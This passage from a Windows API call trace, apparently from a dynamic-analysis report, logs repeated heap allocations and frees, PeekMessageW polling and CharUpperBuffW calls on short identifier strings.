(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.912] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.913] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.913] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0254.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.916] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0254.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.916] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0254.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0254.917] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.917] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.918] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.918] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.918] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.918] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.919] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.919] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.919] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.920] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.920] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.921] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: 